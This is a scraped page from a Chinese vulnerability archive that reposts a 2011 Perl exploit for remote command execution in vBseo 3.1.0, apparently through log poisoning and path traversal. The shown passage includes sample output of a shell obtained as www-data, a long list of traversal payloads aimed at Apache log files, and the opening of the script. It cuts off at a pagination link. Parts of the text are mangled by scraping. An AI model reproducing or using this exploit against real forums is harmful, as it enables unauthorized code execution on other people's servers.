vBseo(vBSEO remote execution vulnerability-vulnerability warning-the black bar safety net

2011-06-28T00:00:00
ID MYHACK58:62201131073
Type myhack58
Reporter 佚名
Modified 2011-06-28T00:00:00

Description

!/ usr/bin/perl

vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit

vendor: http://www.vbseo.com/

Author: Jose Luis Gongora Fernandez (a. k. a) JosS

twitter: @JossGongora

mail: joss. xroot(0x40)gmail(0x2e)com

site: http://www.hack0wn.com/

This was written for educational purpose. Use it at your own risk.

Author will be not responsible for any damage.

thanks: CWH Underground

OUTPUT:

Trying to Inject the Code...

Successfully injected in../../../../../../../var/log/apache2/access. log

[shell]:~$ id

uid=3 3(www-data) gid=3 3(www-data) groups=3 3(www-data)

[shell]:~$ uname-a

Linux mediapc 2.6.18-6-6 8 6 #1 SMP Sat Dec 2 7 0 9:3 1:0 5 UTC 2 0 0 8 i686 GNU/Linux

[shell]:~$ exit

joss@h4x0rz:~/Desktop$

use LWP::UserAgent;

use IO::Socket;

use LWP::Simple;

@apache=(

"../../../../../../../apache/logs/error. log",

"../../../../../../../apache/logs/access. log",

"../../../../../../../apache/logs/error. log",

"../../../../../../../apache/logs/access. log",

"../../../../../../../apache/logs/error. log",

"../../../../../../../apache/logs/access. log",

"../../../../../../../etc/httpd/logs/acces_log",

"../../../../../../../etc/httpd/logs/acces. log",

"../../../../../../../etc/httpd/logs/error_log",

"../../../../../../../etc/httpd/logs/error. log",

"../../../../../../../var/www/logs/access_log",

"../../../../../../../var/www/logs/access. log",

"../../../../../../../usr/local/apache/logs/access_log",

"../../../../../../../usr/local/apache/logs/access. log",

"../../../../../../../var/log/apache/access_log",

"../../../../../../../var/log/apache2/access_log",

"../../../../../../../var/log/apache/access. log",

"../../../../../../../var/log/apache2/access. log",

"../../../../../../../var/log/access_log",

"../../../../../../../var/log/access. log",

"../../../../../../../var/www/logs/error_log",

"../../../../../../../var/www/logs/error. log",

"../../../../../../../usr/local/apache/logs/error_log",

"../../../../../../../usr/local/apache/logs/error. log",

"../../../../../../../var/log/apache/error_log",

"../../../../../../../var/log/apache2/error_log",

"../../../../../../../var/log/apache/error. log",

"../../../../../../../var/log/apache2/error. log",

"../../../../../../../var/log/error_log",

"../../../../../../../var/log/error. log",

"../../../../../var/log/access_log",

"../../../../../var/log/access_log"

);

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print"#######################################################################\n";

print "# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit #\n";

print"#######################################################################\n\n";

if (!$ ARGV[0])

{

print "Usage: perl exploit.pl [host]\n";

print "perl exploit.pl localhost\n\n";

[1] [2] next